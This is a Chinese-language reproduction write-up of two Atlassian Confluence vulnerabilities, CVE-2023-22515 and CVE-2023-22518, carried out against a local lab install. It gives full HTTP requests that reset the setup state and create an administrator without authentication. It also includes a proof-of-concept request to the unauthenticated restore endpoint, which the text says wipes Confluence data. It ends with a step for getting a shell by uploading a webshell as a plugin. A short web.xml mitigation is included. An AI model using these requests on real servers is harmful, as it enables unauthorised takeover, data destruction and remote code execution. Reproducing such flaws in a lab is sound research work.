Confluence 漏洞复现（CVE-2023-22515，CVE-2023-22518）

1.CVE-2023-22515权限提升漏洞

1.1漏洞描述

Confluence近期推出的严重漏洞cve-2023-22515，由于未授权和xwork框架问题，导致攻击者可以未授权将系统设置为未安装完成的状态，然后可以进行管理员账号密码设置。从而登录系统，造成敏感信息泄漏等。

漏洞影响版本：

8.0.0 <= Atlassian Confluence < 8.3.3

8.4.0 <= Atlassian Confluence < 8.4.3

8.5.0 <= Atlassian Confluence < 8.5.2

1.2漏洞环境搭建

官网下载https://www.atlassian.com/software/confluence/download-archives

这里我安装到win10,安装版本选择了atlassian-confluence-8.0.4-x64

注意：需要java环境，mysql数据库，

安装成功后访问：http://192.168.2.129:8090/login.action 可以看到安装成功

1.3漏洞复现

/server-info.action?BootstrapStatusProvider.applicationConfig.setupComplete=false

/setup/setupadministrator-start.action

注意要有Setup is already complete - Confluence字段，没有的点进系统设置管理员

覆盖 setupComplete 属性,

POST /setup/setupadministrator.action HTTP/1.1
Host: 192.168.2.129:8090
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=B4C393494A9F11630749454F8C8EBE86
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Atlassian-Token: no-check
Content-Length: 98username=user&fullName=user&email=1111@qq.comt&password=1111&confirm=1111&setup-next-button=Next

成功绕过，添加管理员，注意要加上X-Atlassian-Token: no-check,否则添加用户不成功

此时查看系统用户，发现已经存在user用户

4.漏洞修复

修改 //confluence/WEB-INF/web.xml 文件，并添加以下内容（就在文件末尾的 标签之前）：

<security-constraint><web-resource-collection><url-pattern>/setup/*</url-pattern><http-method-omission>*</http-method-omission></web-resource-collection><auth-constraint /></security-constraint>

2.CVE-2023-22518远程代码执行漏洞

2.1漏洞描述

在复杂的软件架构中，包的继承和命名空间的使用提供了强大的灵活性，但也带来了潜在的安全风险。当子包继承父包时，它们也继承了父包的接口，但并不总是继承相关的安全控制。在 Confluence 这个案例中，Confluence 滥用了 Struts2 的继承关系，从而导致可以一定程度绕过它自身的权限校验，最终通过部分接口串联利用实现无需认证的远程代码执行。

成功利用这个漏洞的攻击者可以在一定程度上绕过身份验证，而后可以通过串联后台接口，无需认证即可控制并且接管服务器。**需要特别注意的是，该漏洞利用会导致 Confluence 数据清空，对应用数据完整性产生不可逆的影响。**未授权的攻击者利用该漏洞，配合 admin api，可实现远程代码执行，最终控制服务器权限。

2.2漏洞复现

漏洞POC

POST /json/setup-restore.action HTTP/1.1
Host: 192.168.2.129:8090
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=9D2635DE04696EA41660666044100BB2
Connection: close

看到这个页面代表漏洞存在，

可以看到是未授权访问了备份页面

3.漏洞利用

结合漏洞利用,进行getshell

通过后台的“管理应用”->“上传应用”功能, 上传一个马上去即可